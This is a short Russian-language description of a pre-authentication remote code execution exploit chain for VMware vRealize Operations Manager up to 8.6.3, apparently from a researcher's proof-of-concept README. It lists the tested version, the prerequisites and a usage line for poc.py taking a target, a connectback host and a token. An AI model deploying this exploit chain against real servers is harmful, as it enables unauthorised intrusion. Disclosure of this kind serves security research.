
Это эксплойт RCE без предварительной аутентификации для VMware vRealize Operations Manager
Это эксплойт RCE без предварительной аутентификации для VMware vRealize Operations Manager (vROPS), затрагивающий версии <= 8.6.3.19682901.
Steven Seeley из Qihoo 360 Vulnerability Research Institute
Эксплойт был протестирован против версии 8.6.3.19682901 с использованием файла vRealize-Operations-Manager-Appliance-8.6.3.19682901_OVF10.ova (SHA1: 4637b6385db4fbee6b1150605087197f8d03ba00), но, как известно, он работает и с другими более старыми версиями.
Этот эксплойт объединяет три уязвимости, которые были исправлены. Более подробную информацию можно найти в записи в блоге:
Этот эксплойт потребует от атакующего предоставить:
APUAT-8.5.0.18176777.pak.В этом эксплойте много движущихся частей, надеюсь, я спроектировал его правильно, чтобы он сработал с первого раза.
В среднем эксплойт выполняется за ~1m34.142s (протестировано 5 раз), я пытался сделать его быстрее, но он укладывается в отведённое для соревнования время ;->
researcher@mars:~$ ./poc.py
(+) usage: ./poc.py <target> <connectback> <dashboardlink_token>
(+) eg: ./poc.py 192.168.2.196 192.168.2.234 uuncuybis9
